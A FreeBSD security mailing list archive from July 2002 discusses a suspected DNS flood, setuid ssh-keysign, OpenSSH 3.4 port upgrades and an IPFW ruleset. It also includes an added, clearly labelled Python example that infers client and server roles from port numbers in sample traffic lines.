(m) +27.82.389.5389
http://www.uunet.co.za
08600 UUNET (08600 88638)

From owner-freebsd-security Mon Jul 1 5:34: 0 2002
Date: Mon, 1 Jul 2002 15:32:34 +0300
From: Peter Pentchev
To: Tilo Kremer
Cc: freebsd-security@freebsd.org
Subject: Re: other DoSes
Message-ID: <20020701123233.GC376@straylight.oblivion.bg>
References: <20020701132845.A88200@public.uni-hamburg.de>
In-Reply-To: <20020701132845.A88200@public.uni-hamburg.de>

On Mon, Jul 01, 2002 at 01:28:45PM +0200, Tilo Kremer wrote:
> hi,
> apart from the apache worm, on friday i saw some other weird things going on on my freebsd machines:
> my dns was flooding my mx. resolver:53 -> mx:1032

This is most probably in reverse: I would guess that, in fact, it was your mail exchanger sending lots of requests to your DNS server. The value of the port number at the MX's side - 1032 - seems like an ephemeral port, one that is allocated dynamically for each outgoing connection.

Thus, my guess would be that something is actually flooding your MX server (or, to be a bit more pedantic, some service running on that server) with some kind of application requests, and the server is trying to resolve the flooder's IP addresses to hostnames so it can log them properly.

Take a look at the logs of all the services running on your mail exchanger at the time; it does not have to be mail-related (web, SSH, FTP come to mind), and even if it is, you still have a choice between SMTP, POP3, IMAP, or some other e-mail related service. Try to find out which service was generating the name resolution requests, then try to find out whether they were indeed a result of an attack or just normal high traffic.

G'luck,
Peter

--
Peter Pentchev roam@ringlet.net roam@FreeBSD.org
PGP key: http://people.FreeBSD.org/~roam/roam.key.asc
Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553
I am the meaning of this sentence.
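
The inference in the reply above (the end on a low, well-known port is the service, the end on a high, dynamically allocated port is the client that started the exchange) can be applied mechanically to a packet summary, followed by the step of asking which inbound service on the DNS client could be triggering the lookups. This is an added example, not part of the original message; the line format, the host names, the sample lines (all constructed) and the 1024 port threshold are assumptions.

```python
import re
from collections import Counter

# Constructed sample, in the "host:port -> host:port" notation used in the thread.
SAMPLE = """\
resolver:53 -> mx:1032
resolver:53 -> mx:1032
mx:1032 -> resolver:53
resolver:53 -> mx:1033
203.0.113.7:4021 -> mx:25
203.0.113.7:4022 -> mx:25
203.0.113.9:3310 -> mx:25
mx:25 -> 203.0.113.7:4021
mx:1040 -> 203.0.113.7:1050
"""

LINE_RE = re.compile(r"^\s*(\S+):(\d+)\s*->\s*(\S+):(\d+)\s*$")
WELL_KNOWN_MAX = 1023  # assumption: ports below 1024 belong to services


def classify(line):
    """Return (client, server, service_port, direction), or None when the
    line does not parse or the port numbers alone cannot decide."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    src, sport, dst, dport = m.group(1), int(m.group(2)), m.group(3), int(m.group(4))
    src_is_service = sport <= WELL_KNOWN_MAX
    dst_is_service = dport <= WELL_KNOWN_MAX
    if src_is_service == dst_is_service:
        return None  # both high or both low: undecidable from ports
    if dst_is_service:
        return (src, dst, dport, "request")
    # A packet leaving a service port is a reply, so the destination is the client.
    return (dst, src, sport, "reply")


def summarize(text):
    """Count packets per (client, server, service_port), whatever their direction."""
    talks = Counter()
    skipped = []
    for line in text.splitlines():
        if not line.strip():
            continue
        result = classify(line)
        if result is None:
            skipped.append(line.strip())
        else:
            talks[result[:3]] += 1
    return talks, skipped


def lookup_suspects(talks, dns_port=53):
    """For every host acting as a DNS client, list the other services it
    offers and who talks to them: candidates for what triggers the lookups."""
    suspects = {}
    for (client, _server, port) in talks:
        if port != dns_port:
            continue
        offered = {}
        for (remote, host, svc_port), count in talks.items():
            if host == client and svc_port != dns_port:
                offered.setdefault(svc_port, Counter())[remote] += count
        suspects[client] = offered
    return suspects


def report(text):
    """Build a short plain-text report from a packet summary."""
    talks, skipped = summarize(text)
    lines = []
    for host, services in sorted(lookup_suspects(talks).items()):
        lines.append(f"{host} is a DNS client; inbound services seen on it:")
        for port, clients in sorted(services.items()):
            top = ", ".join(f"{c} ({n} pkts)" for c, n in clients.most_common(3))
            lines.append(f"  port {port}: {top}")
    lines.append(f"{len(skipped)} line(s) undecidable from ports alone")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE))
```

The threshold is a heuristic: a service bound to a high port is reported as undecidable rather than guessed, so those lines still need the service logs the reply tells the poster to read.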

From owner-freebsd-security Mon Jul 1 6:24: 5 2002
To: Darren Reed
Cc: security@freebsd.org
Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current.
References: <200206301817.EAA05639@caligula.anu.edu.au>
From: Dag-Erling Smorgrav
Date: 01 Jul 2002 15:23:59 +0200
In-Reply-To: <200206301817.EAA05639@caligula.anu.edu.au>

Darren Reed writes:
> With OpenSSH 3.4, ssh-keysign gets installed setuid-root.

Not in FreeBSD.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Mon Jul 1 6:36:30 2002
To: Joao Schim
Cc: freebsd-security@freebsd.org
Subject: Re: SSH Patches
References: <20020628193052.A42173-100000@blues.jpj.net> <3D202D22.DFEBDF72@bowtie.nl>
From: Dag-Erling Smorgrav
Date: 01 Jul 2002 15:36:23 +0200
In-Reply-To: <3D202D22.DFEBDF72@bowtie.nl>

Joao Schim writes:
> You mean that the other bugs Theo de Raadt spoke about (those 5600 lines)
> don't concern FreeBSD 4.6-RELEASE ?
>
> iirc there were more issues than just those pointed out by ISS.

Theo has an agenda. His actions and words are intended to serve that agenda, not the needs of FreeBSD users. Your confusion arises from failure to recognize the gap between the two.

Note that I'm not bashing Theo here.
He did what he could to extract some positive publicity out of what was effectively a PR disaster for OpenBSD, engineered by ISS (who also have their agenda.) He got caught between a rock and a hard place and tried to make the most out of a rotten situation... no matter how much I disapprove of the ensuing circus, I can't really blame him for trying to defend himself, though I still think he went a little too far.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Mon Jul 1 6:42:44 2002
Message-ID: <3D205C4A.3E1D2935@centtech.com>
Date: Mon, 01 Jul 2002 08:42:34 -0500
From: Eric Anderson
To: Dag-Erling Smorgrav
Cc: freebsd-security@freebsd.org
Subject: Re: SSH Patches
References: <20020628193052.A42173-100000@blues.jpj.net> <3D202D22.DFEBDF72@bowtie.nl>

Although, it is almost sad to see:

"One remote hole in the default install, in nearly 6 years!"

On the OpenBSD page now. Oh well.

Eric

Dag-Erling Smorgrav wrote:
> Note that I'm not bashing Theo here. He did what he could to extract
> some positive publicity out of what was effectively a PR disaster for
> OpenBSD, engineered by ISS (who also have their agenda.) He got
> caught between a rock and a hard place and tried to make the most out
> of a rotten situation... no matter how much I disapprove of the
> ensuing circus, I can't really blame him for trying to defend himself,
> though I still think he went a little too far.

--
------------------------------------------------------------------
Eric Anderson Systems Administrator Centaur Technology
He who laughs last didn't get the joke.
------------------------------------------------------------------

From owner-freebsd-security Mon Jul 1 6:50:36 2002
Date: Mon, 1 Jul 2002 09:50:22 -0400
From: "Peter C. Lai"
To: "Jack L.
 Stone"
Cc: Scott Robbins, FreeBSD user, Scott Gerhardt, FreeBSD, freebsd-security@FreeBSD.ORG
Subject: Re: Sshd fix
Message-ID: <20020701095022.A20329@cowbert.2y.net>
Reply-To: peter.lai@uconn.edu
References: <3.0.5.32.20020629173550.0117cc50@mail.sage-one.net> <3.0.5.32.20020629173550.0117cc50@mail.sage-one.net> <20020630004754.GA2600@scott1.homeunix.net> <3.0.5.32.20020629192508.0117cc50@mail.sage-one.net>
In-Reply-To: <3.0.5.32.20020629192508.0117cc50@mail.sage-one.net>; from jackstone@sage-one.net on Sat, Jun 29, 2002 at 07:25:08PM -0500

On Sat, Jun 29, 2002 at 07:25:08PM -0500, Jack L. Stone wrote:
> At 07:47 PM 6.29.2002 -0500, Scott Robbins wrote:
> >On Sat, Jun 29, 2002 at 05:35:50PM -0500, Jack L. Stone wrote:
> >> At 07:07 PM 6.28.2002 -0600, FreeBSD user wrote:
> >> >cd /usr/ports/security/openssh-portable && make -DOPENSSH_OVERWRITE_BASE
> >> install distclean
> >> >
> >> I just ran this on a test box and the sshd version shows no change... I saw
> >> it compile and install, but #sshd -V gives old version #...
> >>
> >> What did I do wrong here...??
> >
> >BTW after the other Scott's post, I tried it his way--leaving out
> >sshd_enable and sshd_program. Worked quite well--also, one reason I
> >haven't done the overwrite option--as Jonathan said, won't that get
> >clobbered next time you do make world?
> >
> >Interestingly enough, pkg-message suggests doing this--leaving
> >sshd_enable at YES, adding sshd_program and then editing the path, (I
> >assume root's) so that /usr/local/sbin comes before /usr/sbin.
> >However, I've found the lazy man's way, which seems to be efficient as
> >well, to be a combination of Jonathan's and the other Scott's.
> >
> >I realize this is not exactly what Jack is asking, but I'm wondering
> >too--if one does the OVERWRITE, won't it get clobbered upon the next
> >make world?
> >
> >Thanks
> >Scott Robbins
> >>
> This is what worries me too. I deinstalled the ssh port right afterwards,
> but I'm wondering what else is changed. I noticed it updated the
> openssl-0.9.6a to 0.9.6d that I didn't expect. The /var/db/pkg shows that
> "d" version installed.
>
> I'm running SSL on that machine and it still says 0.9.6.a when I load
> Apache_modssl and OpenSSH, etc. But, NOW, I'm really worried that I shot
> myself in the foot and this is waiting to bite me later.

ssl for apache (both apache13-modssl and apache13-ssl) statically links openssl. If you want to upgrade your modssl to use the new openssl, you should recompile and reinstall it.

>
> If anyone knows the answer to what Scott said about the next make world
> clobbering things, please let me know....
>
> Best regards,
> Jack L. Stone,
> Administrator
>
> SageOne Net
> http://www.sage-one.net
> jackstone@sage-one.net

--
Peter C. Lai
University of Connecticut
Dept.
of Molecular and Cell Biology | Undergraduate Research Assistant
http://cowbert.2y.net/

From owner-freebsd-security Mon Jul 1 6:50:47 2002
To: Eric Anderson
Cc: freebsd-security@freebsd.org
Subject: Re: SSH Patches
References: <20020628193052.A42173-100000@blues.jpj.net> <3D202D22.DFEBDF72@bowtie.nl> <3D205C4A.3E1D2935@centtech.com>
From: Dag-Erling Smorgrav
Date: 01 Jul 2002 15:50:40 +0200
In-Reply-To: <3D205C4A.3E1D2935@centtech.com>

Eric Anderson writes:
> Although, it is almost sad to see:
>
> "One remote hole in the default install, in nearly 6 years!"
>
> On the OpenBSD page now. Oh well.

*ahem* there are some who would say that "statistic" has been a blatant lie for almost as long as it's been on the web page.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Mon Jul 1 6:54: 5 2002
Date: Mon, 1 Jul 2002 15:53:45 +0200
From: Pierre Beyssac
To: Eric Anderson
Cc: Dag-Erling Smorgrav, freebsd-security@FreeBSD.ORG
Subject: Re: SSH Patches
Message-ID: <20020701155345.A90960@bofh.enst.fr>
References: <20020628193052.A42173-100000@blues.jpj.net> <3D202D22.DFEBDF72@bowtie.nl> <3D205C4A.3E1D2935@centtech.com>
In-Reply-To: <3D205C4A.3E1D2935@centtech.com>; from anderson@centtech.com on Mon, Jul 01, 2002 at 08:42:34AM -0500

On Mon, Jul 01, 2002 at 08:42:34AM -0500, Eric Anderson wrote:
> Although, it is almost sad to see:
>
> "One remote hole in the default install, in nearly 6 years!"
>
> On the OpenBSD page now. Oh well.

Perhaps they should make that "No remote root in today's default install" instead. Sounds less likely to need a change in the future :-)

--
Pierre Beyssac pb@enst.fr

From owner-freebsd-security Mon Jul 1 6:57:23 2002
Date: Mon, 1 Jul 2002 09:57:19 -0400
From: Chris Johnson
To: Dag-Erling Smorgrav
Cc: security@freebsd.org
Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current.
Message-ID: <20020701135719.GA65770@palomine.net>
References: <200206301817.EAA05639@caligula.anu.edu.au>

On Mon, Jul 01, 2002 at 03:23:59PM +0200, Dag-Erling Smorgrav wrote:
> Darren Reed writes:
> > With OpenSSH 3.4, ssh-keysign gets installed setuid-root.
>
> Not in FreeBSD.

Are you sure?

===> Registering installation for openssh-portable-3.4p1_2
===> SECURITY NOTE: This port has installed the following binaries which execute with increased privileges.
95440 296 -rws--x--x 1 root wheel 150996 Jul 1 09:54 /usr/local/libexec/ssh-keysign

Chris Johnson

From owner-freebsd-security Mon Jul 1 6:57:36 2002
Message-ID: <01a001c22107$3d3b2850$0200a8c0@winxp>
From: "nascar24"
Subject: Making a firewall more closed
Date: Mon, 1 Jul 2002 15:57:23 +0200

Hello all,

I've been using the IPFW for some time now but I have one problem. I have closed my firewall (I guess) from attacks from the outside world. But I am open to attacks from within, i.e: trojan horses etc.

Here is my rc.firewall.rules file. I think it is in rule 500 & 550. But if I change them to 21,22,80,8080 I cannot connect to any websites or FTP sites.

# allow loopback traffic
add 100 allow ip from any to any via lo0

# protect loopback address
add 200 deny log ip from 127.0.0.1 to any
add 249 deny log ip from any to 127.0.0.1

# block spoofs
add 400 deny log ip from me to any in via ed0

# enable NATD
add 425 divert 8668 ip from any to any via ed0

# check dynamic rules
add 450 check-state

# make dynamic entries for all outgoing traffic
add 500 allow log tcp from me to any 1-65535 keep-state out
add 550 allow log udp from me to any 1-65535 keep-state out

# services we offer to the world
add 600 allow log tcp from any to me 22,5067,5617,8472,10000 keep-state in

# pass ICMP
add 700 allow log icmp from me to any out
add 750 allow log icmp from any to me in

# pass everything on private LAN
add 800 allow log all from 192.168.0.0/16 to any
add 850 allow log all from any to 192.168.0.0/16

# log rejects that have fallen through
add 65000 deny log ip from any to any

I hope you can help, thanks in advance.

Marcel.

From owner-freebsd-security Mon Jul 1 7: 1:39 2002
To: Chris Johnson
Cc: security@freebsd.org
Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current.
References: <200206301817.EAA05639@caligula.anu.edu.au> <20020701135719.GA65770@palomine.net>
From: Dag-Erling Smorgrav
Date: 01 Jul 2002 16:01:34 +0200
In-Reply-To: <20020701135719.GA65770@palomine.net>

Chris Johnson writes:
> On Mon, Jul 01, 2002 at 03:23:59PM +0200, Dag-Erling Smorgrav wrote:
> > Darren Reed writes:
> > > With OpenSSH 3.4, ssh-keysign gets installed setuid-root.
> > Not in FreeBSD.
> Are you sure?

I don't care about the port. Personally, I'd rather it didn't exist, and I think admins who install it need to have their head checked.

des@des ~% cat /usr/src/secure/usr.bin/ssh-keysign/Makefile
# $FreeBSD: src/secure/usr.bin/ssh-keysign/Makefile,v 1.4 2002/06/25 19:10:09 des Exp $

PROG= ssh-keysign
MAN= ssh-keysign.8
CFLAGS+=-I${SSHDIR}

DPADD= ${LIBSSH} ${LIBCRYPTO} ${LIBZ}
LDADD= -lssh -lcrypto -lz

.include

.PATH: ${SSHDIR}

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Mon Jul 1 7: 2:45 2002
Message-ID: <3D2060F9.9FA544B7@centtech.com>
Date: Mon, 01 Jul 2002 09:02:33 -0500
From: Eric Anderson
To: Dag-Erling Smorgrav
Cc: freebsd-security@freebsd.org
Subject: Re: SSH Patches
References: <20020628193052.A42173-100000@blues.jpj.net> <3D202D22.DFEBDF72@bowtie.nl> <3D205C4A.3E1D2935@centtech.com>

Dag-Erling Smorgrav wrote:
>
> *ahem* there are some who would say that "statistic" has been a
> blatant lie for almost as long as it's been on the web page.
>

Heheheh. I won't argue with you there. However, still better than MS's:

No default install without a remote root in over 20 years.

Eric

--
------------------------------------------------------------------
Eric Anderson Systems Administrator Centaur Technology
He who laughs last didn't get the joke.
------------------------------------------------------------------

From owner-freebsd-security Mon Jul 1 7: 7:51 2002
To: Eric Anderson
Cc: freebsd-security@freebsd.org
Subject: Re: SSH Patches
References: <20020628193052.A42173-100000@blues.jpj.net> <3D202D22.DFEBDF72@bowtie.nl> <3D205C4A.3E1D2935@centtech.com> <3D2060F9.9FA544B7@centtech.com>
From: Dag-Erling Smorgrav
Date: 01 Jul 2002 16:07:44 +0200
In-Reply-To: <3D2060F9.9FA544B7@centtech.com>

Eric Anderson writes:
> Heheheh. I won't argue with you there. However, still better than MS's:
>
> No default install without a remote root in over 20 years.

I think you're wrong here. They didn't have a networking stack before Windows 3.11 for Workgroups, in the early 1990s, so it's more like ten years.

(yes, I know about Trumpet Winsock, but it was third-party)

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Mon Jul 1 7:12:14 2002
Message-ID: <3D206335.6A477A1F@centtech.com>
Date: Mon, 01 Jul 2002 09:12:05 -0500
From: Eric Anderson
To: Dag-Erling Smorgrav
Cc: freebsd-security@freebsd.org
Subject: Re: SSH Patches
References: <20020628193052.A42173-100000@blues.jpj.net> <3D202D22.DFEBDF72@bowtie.nl> <3D205C4A.3E1D2935@centtech.com> <3D2060F9.9FA544B7@centtech.com>

Dag-Erling Smorgrav wrote:
>
> Eric Anderson writes:
> > Heheheh. I won't argue with you there.
However, still better than MS's: > > > > No default install without a remote root in over 20 years. > > I think you're wrong here. They didn't have a networking stack before > Windows 3.11 for Workgroups, in the early 1990s, so it's more like ten > years. > > (yes, I know about Trumpet Winsock, but it was third-party) Oh yea.. That's right - my bad. It's been a long time since I've heard Trumpet Winsock.. Eric -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology He who laughs last didn't get the joke. ------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 7:30:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 14B9B37B405 for ; Mon, 1 Jul 2002 07:30:41 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4A53343E1A for ; Mon, 1 Jul 2002 07:30:40 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id D467365; Mon, 1 Jul 2002 09:30:39 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g61EUd4N006719; Mon, 1 Jul 2002 09:30:39 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g61EUdeJ006718; Mon, 1 Jul 2002 09:30:39 -0500 (CDT) Date: Mon, 1 Jul 2002 09:30:39 -0500 From: "Jacques A. Vidrine" To: Dag-Erling Smorgrav Cc: "JP Villa (Datafull.com)" , freebsd-security@FreeBSD.ORG Subject: Re: Re[2]: openssh OR openssh-portable Message-ID: <20020701143038.GM4764@madman.nectar.cc> Mail-Followup-To: "Jacques A. 
Vidrine" , Dag-Erling Smorgrav , "JP Villa (Datafull.com)" , freebsd-security@FreeBSD.ORG References: <3D1AD7C4.9020909@cerint.pl> <41256714305.20020627163946@datafull.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 27, 2002 at 11:52:49PM +0200, Dag-Erling Smorgrav wrote: > "JP Villa (Datafull.com)" writes: > > I think the original question was pointing to this too, > > so I rephrase: openssh or openssh-portable? or maybe > > openssh 3.4 properly merged on a production codebase? and > > in that case, when? > > In my opinion, the latter is the best option, but it's your machine > and your call. Jacques Vidrine has the final word in this matter, and > I can't speak for him, but I expect 3.4 will hit -STABLE (and > hopefully the security branches) sometime next week. At this time, OpenSSH 3.4 will not be merged into the security branches. They are currently not vulnerable, and major upgrades are outside the scope of the security branches, particularly when such upgrades are practically guaranteed to break existing installations. Of course, OpenSSH 3.4 is always available via the Ports Collection, and I would, in fact, recommend that users take advantage of it and turn on PrivilegeSeparation if at all possible. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . 
nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 7:37:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2303737B400; Mon, 1 Jul 2002 07:37:26 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id A1CA643E09; Mon, 1 Jul 2002 07:37:25 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 3C6A85349; Mon, 1 Jul 2002 16:37:24 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Jacques A. Vidrine" Cc: "JP Villa (Datafull.com)" , freebsd-security@FreeBSD.ORG Subject: Re: Re[2]: openssh OR openssh-portable References: <3D1AD7C4.9020909@cerint.pl> <41256714305.20020627163946@datafull.com> <20020701143038.GM4764@madman.nectar.cc> From: Dag-Erling Smorgrav Date: 01 Jul 2002 16:37:23 +0200 In-Reply-To: <20020701143038.GM4764@madman.nectar.cc> Message-ID: Lines: 11 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Jacques A. Vidrine" writes: > Of course, OpenSSH 3.4 is always available via the Ports Collection, > and I would, in fact, recommend that users take advantage of it and > turn on PrivilegeSeparation if at all possible. 
I wouldn't - the port needs quite a bit of work and is too much of a moving target right now :( DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 7:40:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CCD6A37B400; Mon, 1 Jul 2002 07:40:44 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0E3A043E09; Mon, 1 Jul 2002 07:40:44 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 63BF034; Mon, 1 Jul 2002 09:40:43 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g61Eeh4N006826; Mon, 1 Jul 2002 09:40:43 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g61EehoI006825; Mon, 1 Jul 2002 09:40:43 -0500 (CDT) Date: Mon, 1 Jul 2002 09:40:43 -0500 From: "Jacques A. Vidrine" To: Dag-Erling Smorgrav Cc: freebsd-security@FreeBSD.ORG, dinoex@FreeBSD.ORG Subject: Re: Re[2]: openssh OR openssh-portable Message-ID: <20020701144043.GQ4764@madman.nectar.cc> Mail-Followup-To: "Jacques A. 
Vidrine" , Dag-Erling Smorgrav , freebsd-security@FreeBSD.ORG, dinoex@FreeBSD.org References: <3D1AD7C4.9020909@cerint.pl> <41256714305.20020627163946@datafull.com> <20020701143038.GM4764@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Jul 01, 2002 at 04:37:23PM +0200, Dag-Erling Smorgrav wrote: > "Jacques A. Vidrine" writes: > > Of course, OpenSSH 3.4 is always available via the Ports Collection, > > and I would, in fact, recommend that users take advantage of it and > > turn on PrivilegeSeparation if at all possible. > > I wouldn't - the port needs quite a bit of work and is too much of a > moving target right now :( I'll have us agree by defining `if at all possible' to include a stable, working OpenSSH port :-) I'm sure Dirk is ready and willing to fix any problems that crop up. I think that the port currently provides the functionality needed by a large cross-section of users. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . 
nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 7:44: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2888A37B400 for ; Mon, 1 Jul 2002 07:44:00 -0700 (PDT) Received: from zeta.qmw.ac.uk (zeta.qmw.ac.uk [138.37.6.6]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3B44D43E2F for ; Mon, 1 Jul 2002 07:43:59 -0700 (PDT) (envelope-from d.m.pick@qmul.ac.uk) Received: from xi.css.qmw.ac.uk ([138.37.8.11]) by zeta.qmw.ac.uk with esmtp (Exim 3.32 #1) id 17P2PE-0004ZB-00 for security@freebsd.org; Mon, 01 Jul 2002 15:43:56 +0100 Received: from localhost ([127.0.0.1] helo=xi.css.qmw.ac.uk) by xi.css.qmw.ac.uk with esmtp (Exim 3.34 #1) id 17P2Ol-0002Jf-00 for security@freebsd.org; Mon, 01 Jul 2002 15:43:27 +0100 X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 To: security@freebsd.org Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. In-reply-to: Your message of "01 Jul 2002 16:01:34 +0200." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 01 Jul 2002 15:43:27 +0100 From: David Pick Message-Id: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 01 Jul 2002 16:01:34 +0200, Dag-Erling Smorgrav wrote: > Chris Johnson writes: > > On Mon, Jul 01, 2002 at 03:23:59PM +0200, Dag-Erling Smorgrav wrote: > > > Darren Reed writes: > > > > With OpenSSH 3.4, ssh-keysign gets installed setuid-root. > > > Not in FreeBSD. > > Are you sure? > > I don't care about the port. Personally, I'd rather it didn't exist, > and I think admins who install it need to have their head checked. 
At least the port can be built and installed without having to have large amounts of system source installed on the limited amount of hard disc available on a laptop with multiple OSs installed. Of course, a binary system update can be installed even more easily without *any* source but we don't have any such available. At least we can build a binary update "package" for the "ports" version using a simple "make package"; it's harder for the version integrated into the base. The previous SA (SA-02:13) on OpenSSH 2.9 as included in the base included instructions for building a corrected version with the minimum amount of compilation and minimum amount of source installed but didn't include any help on just how much source *was* the minimum amount. And you had to extract parts of (IIRC) three of the "source" distributions. This is even more true for the recent resolver problems... Please note that I have *not* asked for a binary update. I don't want to get flamed the way Brett does... -- David Pick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 9:17:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9807537B400 for ; Mon, 1 Jul 2002 09:17:31 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id BE70243E09 for ; Mon, 1 Jul 2002 09:17:30 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id KAA05006; Mon, 1 Jul 2002 10:17:17 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. 
Message-Id: <4.3.2.7.2.20020701101637.022a78a0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 01 Jul 2002 10:17:09 -0600 To: Eric Anderson , Dag-Erling Smorgrav From: Brett Glass Subject: Re: SSH Patches Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <3D205C4A.3E1D2935@centtech.com> References: <20020628193052.A42173-100000@blues.jpj.net> <3D202D22.DFEBDF72@bowtie.nl> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 07:42 AM 7/1/2002, Eric Anderson wrote: >Although, it is almost sad to see: > >"One remote hole in the default install, in nearly 6 years!" > >On the OpenBSD page now. Oh well. It's still the best track record in the world. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 9:31:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 73CF437B401 for ; Mon, 1 Jul 2002 09:31:06 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 786B343E0A for ; Mon, 1 Jul 2002 09:31:05 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id KAA05234; Mon, 1 Jul 2002 10:30:52 -0600 (MDT) 